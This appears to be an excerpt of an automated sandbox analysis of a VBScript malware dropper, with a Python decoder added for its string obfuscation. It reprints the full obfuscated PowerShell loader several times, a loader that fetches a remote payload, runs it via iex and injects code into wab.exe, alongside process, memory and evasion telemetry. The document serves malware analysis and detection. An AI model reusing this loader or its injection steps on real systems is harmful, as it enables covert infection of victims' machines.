Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. 
PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. 
PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
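The captured command line above is the whole deobfuscation key for this stage: `$Massesamfund` is built piecewise into the method name "Substring", and `Lnkampene` walks each string literal from offset 5 in steps of 6, keeping one character per step and ignoring the final chunk, so five filler characters surround every real one. `Kolesterol` then runs the result through `& ($Maimedly)`. The following decoder is an added example written for this report, not code from the sample or from Joe Sandbox. It re-implements that loop, pulls the `$Name=Lnkampene '...'` assignments out of a fragment copied from the command line, and, as a generalization the report does not show, brute-forces the offset/stride pair in case a later build changes the constants 5 and 6. The regex and the `search_stride` helper are this example's own. Only literals without consecutive spaces are included in the fragment: the rendered report has lost runs of spaces inside the other literals (the browser user-agent value and the `Set-Content` command), which shifts the stride and garbles their decoding.

```python
"""Decoder for the string obfuscation in this sample's PowerShell stage.

Added example for this report, not code from the sample or from Joe Sandbox.
It re-implements the `Lnkampene` function visible in the captured command line:

    $Massesamfund='Su'; $Massesamfund+='bstrin'; $Massesamfund+='g'   # "Substring"
    Function Lnkampene($s) {
        For ($i = 5; $i -lt $s.Length - 1; $i += 6) { $out += $s.Substring($i, 1) }
        $out
    }

Every sixth character from offset 5 is real, the five before it are filler, and the
loop bound (`-lt Length - 1`) means the final chunk is never read.
"""
import re

OFFSET = 5   # $Thurl starts at 5
STRIDE = 6   # $Thurl += 6


def lnkampene(s: str) -> str:
    """Python equivalent of the sample's Lnkampene function."""
    return s[OFFSET:len(s) - 1:STRIDE]


# `$Name=Lnkampene '<literal>'` assignments; the sample's literals contain no single quotes.
# This regex is the example's own, not part of the sample.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Lnkampene\s+'([^']*)'")


def decode_assignments(script: str) -> dict:
    """Map each Lnkampene-assigned variable to its decoded value."""
    return {name: lnkampene(lit) for name, lit in ASSIGN_RE.findall(script)}


def search_stride(literal: str, marker: str, max_stride: int = 10) -> list:
    """Brute-force (offset, stride) pairs whose extraction contains `marker`.

    Generalization for builds that change the constants 5 and 6; an assumption of
    this example, not something the report shows. The tail chunk is not dropped here,
    so a trailing filler character may appear in the candidate text.
    """
    hits = []
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            if marker in literal[offset::stride]:
                hits.append((offset, stride))
    return hits


# Fragment copied from the captured command line in this report (not constructed).
# Only literals without consecutive spaces are included; the rendered report has lost
# runs of spaces inside the others, which shifts the stride and garbles their decoding.
CAPTURED_FRAGMENT = (
    "$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';"
    "$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidw"
    "Delag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/"
    "SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';"
    "$Malaxate=Lnkampene 'D.bri>Fiske ';"
    "$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';"
)

if __name__ == "__main__":
    for name, value in decode_assignments(CAPTURED_FRAGMENT).items():
        print(f"${name} = {value!r}")
    url_literal = ASSIGN_RE.findall(CAPTURED_FRAGMENT)[1][1]
    print("stride candidates containing 'http':", search_stride(url_literal, "http"))
```

Running it shows why the report flags the sample: `$Maimedly` decodes to `iex`, so `Kolesterol` is `& iex <string>`; `$Organismers` is the header name `User-Agent`; `$Malaxate` is `>`; and `$Skadevolderne` is the download URL the decoded header is sent to. The same decoder applied to the AMSI captures on this page (the `FromBase64String`/`GetDelegateForFunctionPointer`/`DefineDynamicAssembly` lines) shows the later stages are already plain text by the time AMSI sees them, which is why the obfuscation only buys the sample evasion of static scanning of the .vbs, not of the PowerShell runtime.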
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7E6F87 push esp; retf 1_2_00007FFD9B7E6F88
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8B1DF7 push esp; retf 1_2_00007FFD9B8B1E0C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8B1CE4 push esp; retf 1_2_00007FFD9B8B1CF9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07A308C2 push eax; mov dword ptr [esp], ecx 4_2_07A30AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07A30AB8 push eax; mov dword ptr [esp], ecx 4_2_07A30AC4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_038617B4 push es; iretd 9_2_038617B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_038637E4 pushfd ; ret 9_2_038637E6
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_038647F3 push eax; retf 9_2_03864808
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_03860FF1 push ss; iretd 9_2_0386100F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_03861112 push edi; retf 9_2_0386113D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_03861325 push edi; ret 9_2_03861342
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_03865D34 push esp; retf 9_2_03865D35
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0386117C push esp; iretd 9_2_03861180
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_0386409D push ss; ret 9_2_0386409E
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_03862ABD push cs; ret 9_2_03862ACF
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_038652D4 pushad ; retf 9_2_038652D5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_03861207 push ds; retf 9_2_0386120A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_03863E28 push ecx; ret 9_2_03863E3D
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4515
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5379
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6194
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3621
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3320 Thread sleep count: 6194 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3320 Thread sleep count: 3621 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 352 Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
              Source: powershell.exe, 00000001.00000002.2697536992.0000015C468F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04A1DAAC LdrInitializeThunk,LdrInitializeThunk, 4_2_04A1DAAC

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_2656.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3860000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 15FCF8
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. 
PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. 
PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              MITRE ATT&CK Matrix

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
